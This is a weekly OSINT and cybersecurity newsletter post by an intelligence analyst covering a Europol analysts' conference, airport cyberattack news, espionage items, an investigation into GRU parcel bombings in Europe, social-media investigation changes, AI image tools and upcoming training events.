Hi Everyone,

This week I attended an event EUCrimACon 2025 organized by Europol for Crime Intelligence Analysts - a truly valuable experience.

I had the chance to exchange insights with participants from around the world, from Brazil to Australia. The conference covered methodology topics, including the use of Structured Analytic Techniques (SATs), automated data collection combined with more understandable Social Network Analysis (SNA), case studies from various investigations, and aspects of intelligence work such as extremism, terrorism, counterintelligence, and hybrid warfare. A clear standout topic in both presentations and networking was AI. For instance, Canadian law enforcement agencies have implemented AI solutions at the workflow level, with agents supporting Analysts in cases such as Child Exploitation Analysis - covering deepfake child actors, facial recognition, object identification and assist in investigations involving offenders or content sharing.

I’m proud of my team Frontstory[.]pl & VSquare while I was away at the event, they wrapped up our latest investigation into sabotage incidents in Central Europe. You’ll find it below!

Cybersecurity News 

• Cyberattack Disrupts Major European Airports: On Sep 19, a cyberattack hit Collins Aerospace’s MUSE platform, disrupting check-in, boarding, and baggage handling at major European airport hubs (London Heathrow, Brussels, Berlin, and Dublin). Manual check-in was used, safety screening was unaffected, and at the time of writing, the threat actors behind the event have not been identified. Collins Aerospace, a subsidiary of RTX (Raytheon), is a key supplier to the aviation industry and was just days ago awarded a NATO contract for command-and-control software. Its systems are widely deployed in major hubs.

  • Some DNS records for collinsaerospace[.]com were found to be insecure in 2024. You can check this using DNSViz or other DNSSEC checking tools online.

Vulnerabilities & Exploits & Hacks

• Fake FBI Crime Portals Trick Users: Cybercriminals are impersonating FBI complaint websites to steal personal data and money. Find out more.

• Cuneiform-Alphabet XSS Payload Bypasses Filters: The VIEH Group shared info that XSS attacks using ancient Cuneiform encoding to evade traditional defenses. Find out more.
  

  

Threat Hunting & Malware

• Emoji Malware Demonstrates Novel Delivery Tricks: Security researchers shared malware disguised using emojis to evade detection and confuse users. Find out more.

• Formbook Malware Exploits CVE-2017-11882 via RTF: The Formbook banking trojan continues spreading by exploiting a Microsoft Office RTF vulnerability, showing the persistence of legacy exploits. Find out more.

Acquisitions & Funding

• Hack The Box acquires LetsDefend: On September 16, 2025, Hack The Box (HTB) announced its acquisition of LetsDefend, a leading blue team upskilling platform known for hands-on SOC simulations and a growing community. Find out more.

  • HTB also plans to train AI on user data.

• CrowdStrike acquires Pangea to tackle AI-Driven threats: With AI agents outnumbering humans and operating autonomously, CrowdStrike sees “conversations” as the new attack surface, particularly indirect prompt injection attacks that exploit AI assistants. Find out more.

• Silent Push raises $10M Series B to expand preemptive cybersecurity. Find out more.

Other

• CompTIA launches SecAI+ Beta Exam: IT professionals with 3–4 years experience, including 2 years in cybersecurity, can join the beta to help develop the new AI-focused SecAI+ certification; participants must qualify and complete the exam by October 17, 2025, to receive an incentive, with the beta period ending October 31, 2025. CompTIA Survey.

📰Reports

• LinkedIn Intelligence Report 2025 — Report by GoodCall analyzing defense, military technology, and aerospace sectors in the Czech Republic.

• Annual Report 2024 — Report by International Centre for Counter-Terrorism (ICCT).

Espionage & Counterintelligence

• Israel weighed killing Iran’s Supreme Leader: Secret talks in early June war days revealed Israel considered assassinating Ali Khamenei. Find out more.

• Moldovan ex-intel officer charged with treason: Alexandru Bălan is under investigation by Romania’s Directorate for Investigating Organized Crime and Terrorism (DIICOT) accused of leaking secrets to Belarus KGB, questioned in Bucharest. Find out more. (.ro)

• Germany warns against Russian recruitment: BfV (Germany’s domestic intelligence agency) launches campaign urging citizens “Don’t become a disposable agent.” Find out more. 

• Russian jets over Petrobaltic platform: Two fighters carried out a provocative low flyover in the Baltic Sea - Russian actions intended to raise concern and create political confusion. Find out more.  

• Russia’s elite drone unit revealed: RFE/RL uncovers secret “Rubicon” group inside Russia’s drone warfare operations. Find out more.

Sabotages in Central Europe

Our latest investigation: Sabotage in Central Europe – Russia’s GRU Explosive Parcels. Russian GRU operatives organized the 2024 parcel bombings across Europe, hiding explosives in ordinary DHL and DPD shipments. Packages disguised as cosmetics, sex toys, or massage pillows detonated in Leipzig (Germany), Jabłonowo (Poland), and Birmingham (UK).

Details of the most dangerous Russian intelligence operation:
As a VSquare and Frontstory[.]pl together with our international partners Re:Baltica (Latvia), LRT (Lithuania), Delfi (Estonia), and The Insider, traced the plot over six months. We have identified several people involved in transporting the bombs on behalf of the GRU. We have reconstructed the route taken by the explosive packages, before they exploded, they crossed the borders of several EU countries multiple times without arousing suspicion.

GRU remotely recruited Russian and Ukrainian nationals to carry out these acts, and the operation was also linked to arson attacks in Poland and Lithuania. The ringleader was a convicted smuggler of radioactive materials.

👉️ Read the full text in English, along with a shorter English version featuring excellent visuals created by my colleague - Data Journalist 👏 and our Polish text.

SOCMINT

• Facebook Removes Group Chats from Messenger: Facebook is discontinuing its Community Chats feature in Messenger, notifying admins as the platform shifts focus back to keeping discussions within Facebook itself. During investigations of illicit content, especially in seemingly inactive or “clean” Facebook groups, these chats were a goldmine - allowing easy identification of group admins, tracking information flow, or discovering private Telegram and Signal groups.

  • After the announcement, there’s noticeable migration of discussions to Discord.

  

  Random example of a group

• Facebook Removes Post Search: Facebook has removed the ability to search posts, limiting search results to people, videos, Marketplace, pages, groups, and events.

  

• Instagram Tests Profile Photos in Push Notifications: Instagram is experimenting with iOS push notifications that show users’ profile photos. Each notification fetches the image, allowing Meta to track impressions and collect detailed device data, raising privacy concerns.

AI

• AI now create incredibly realistic photos that could be mistaken for real life. You can find the full prompts and step-by-step guide to make this image here.

  

  Author of this prompt/photo: Ruben Hassid

  • Also AI can now age people down in seconds to create a perfectly realistic teen photo like Jessica showed on her LinkedIn when she transformed herself into a teenager, prompting the question: would you let your child talk to this person online?

OSINT Section

Tools

AI Image Detection Tools

• AI or Not (paid): Shows possible sources of an image and flags AI-generated content; interesting feature but still under development.

  

• Image Whisperer (free): Offers basic AI image detection capabilities for free.

• Detectron2 is a computer vision library developed by Facebook AI Research, designed for object detection, classification, and tracking in images and videos, as well as for object segmentation from the background. It enables identifying object categories, locating them within a scene, and analyzing their movement over time.

Privacy

• Tor project beta VPN: Tor releases a beta VPN for Android with per-app routing, IP masking, and .onion support. Experimental and potentially unstable, not yet safe for sensitive use.

• Proton adds monero payments: Proton VPN, Mail, Drive, Pass, and Unlimited will soon allow users to pay with Monero.

• LinkedIn privacy AI use: From November 4, LinkedIn will use your posts to train its AI by default unless you disable this in your privacy settings by November 3.

  

Google Updates

• Google LERS breach: A group named Scattered Lapsus$ Hunters accessed Google’s Law Enforcement Request System (LERS) through a fraudulent account, but no requests were submitted before the account was disabled; Google has confirmed the incident.

• Google’s Nanobanana AI Impresses: Google’s new Nanobanana model demonstrates capabilities that outpace Photoshop in several creative AI tasks. Photoshop is now officially behind.

• Google Discover Tests Showing X Posts from Followers: Google is experimenting with showing posts from X (formerly Twitter) accounts that users follow directly in Discover, aiming for more personalized content feeds.

  • How Does Google Discover Work?

Darknet

• FBI Arrests Michigan Tor Operator Again: Conrad Rockenhaus, a disabled U.S. veteran and founder of GreyPony IT, was re-arrested on September 4, 2025, after refusing FBI requests to decrypt his Tor exit node. He previously spent over three years in pre-trial detention. Analysis of the case is on YouTube.

• TradeOgre Wallets Seized: Canadian authorities seized $40 million from TradeOgre wallets.The exchange was previously flagged by Europol for facilitating cash outs by ransomware groups such as Conti and LockBit via low KYC exchanges.

Upcoming CyberSec / OSINT Events

Free

Webinars

• Global Threats Update – Regional Overviews of Maritime Security – Tuesday, September 23, 2025 | 10:00 AM – 10:45 AM | Online. Presented by Risk Intelligence. Registration

• Feedly – AI Prompting Techniques for CTI Analysts – Wednesday, September 24, 2025 | 9:00 AM PT | Online. Registration

• Digital Breadcrumbs, Part 2 – OSINT & SOCMINT for Financial Crimes – Wednesday, September 24, 2025 | 1:00 PM EST | Online. Hosted by Spokeo Law Enforcement. Registration, link2

• Intro to Mapmaking for Journalists – Saturday, September 27, 2025 | Online. Learn to turn geospatial data into interactive maps. Registration.

• ChildSafeNet & Asia Centre – Digital Security Training– Thursday, October 9, 2025 | 10:00 AM – 12:00 Noon Nepal Time | Online, Asia Pacific Centre. Registration

• 9th Global Conference on Criminal Finances and Cryptoassets – Tuesday–Wednesday, October 28–29, 2025 | Hybrid at UNODC Headquarters, Vienna, Austria. Jointly organized by Europol, UNODC, and the Basel Institute on Governance. More Info

  • If you have a chance to go, this would be a cool event to attend.

On Demand

• AML Investigations and the Effective Use of Open Source Intelligence (OSINT). Learn how to leverage OSINT for AML investigations with ACAMS. Watch Here

CTFs

• Trace Labs Search Party OSINT CTF Webinar – Sunday, September 28, 2025. Registration

  Cybercrime CTF for Law Enforcement Agencies – c0c0n LEA CTF 2025 , October 10–11, 2025 | India. Practical CTF event for law enforcement cybercrime teams. More Info

Paid

• Cybersecurity Industrial Applications Summer School October 12–15, 2025 | Tirana, Albania. Program chaired by University of Western Macedonia, with organizing chairs from EPOKA University, Albanian Academy of Sciences, and Aristotle University of Thessaloniki. More Info

• Mega Sekurak Hacking Party 2025 – Monday, October 20, 2025 | Kraków, Poland. More Info

• Palo Alto One-Day Intel Workshop – Tuesday, October 21, 2025 | 9:00 AM (~9 hours) | Palo Alto, California. Organized by MAX Security Solutions; master intelligence collection, assessment, and operational decision-making. More Info

• ISS World Latin America – Intelligence Support Systems, October 21–23, 2025 | Panama City. Training on electronic surveillance, social media/darknet monitoring, and cyber threat detection. More Info

🙃Bonus

This time’s recommendation

The Intelligence Bible: A Comprehensive Guide to Intelligence by Ollie Wright - an essential read for Corporate Risk Management and Protective Intelligence practitioners.